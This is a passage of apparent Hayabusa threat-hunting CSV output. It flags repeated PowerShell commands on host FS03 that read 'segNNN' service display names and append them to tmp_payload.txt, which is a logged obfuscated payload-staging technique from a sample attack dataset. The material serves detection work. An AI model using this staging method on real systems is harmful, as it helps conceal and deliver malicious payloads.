-append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xdb0 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:38:14.217 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg156"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x6a4 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or 
Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:38:14.217 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg156"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xdd0 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:38:15.662 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg157"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xff8 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:38:15.662 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg157"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xa84 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:38:17.100 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: 
c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg158"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xd80 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:38:17.116 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg158"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xe64 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:38:18.559 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg159"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xdcc | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:38:18.559 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg159"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xd74 | User: FS03$ | 
LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:38:20.048 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg160"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xbe8 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:38:20.064 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg160"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x9ac | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:38:21.525 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg161"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xde8 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or 
Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:38:21.525 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg161"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xb00 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:38:22.968 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg162"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x81c | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:38:22.984 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg162"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xacc | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:38:24.421 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: 
c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg163"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x490 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:38:24.437 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg163"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xc1c | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:38:25.872 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg164"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xaf0 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:38:25.884 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg164"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xc18 | User: FS03$ | 
LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:38:27.322 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg165"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x474 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:38:27.338 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg165"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xef4 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:38:28.794 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg166"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xe44 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or 
Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:38:28.794 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg166"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xc94 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:38:30.297 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg167"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x1c8 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:38:30.297 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg167"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xcfc | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:38:31.756 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: 
c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg168"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x984 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:38:31.772 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg168"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x944 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:38:33.217 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg169"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xe7c | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:38:33.217 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg169"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xf3c | User: FS03$ | 
LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:38:34.682 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg170"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x660 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:38:34.682 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg170"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x580 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:38:36.122 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg171"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x3cc | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or 
Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:38:36.138 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg171"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xd28 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:38:37.638 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg172"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x3e8 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:38:37.638 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg172"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xd9c | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:38:39.090 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: 
c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg173"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xd38 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:38:39.090 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg173"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x92c | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:38:40.532 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg174"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xadc | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:38:40.547 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg174"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x68c | User: FS03$ | 
LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:38:41.996 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg175"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xc60 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:38:41.996 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg175"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x940 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:38:43.437 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg176"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x6b8 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or 
Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:38:43.437 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg176"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xe70 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:38:44.878 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg177"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xce0 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:38:44.893 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg177"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xff4 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:38:46.331 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: 
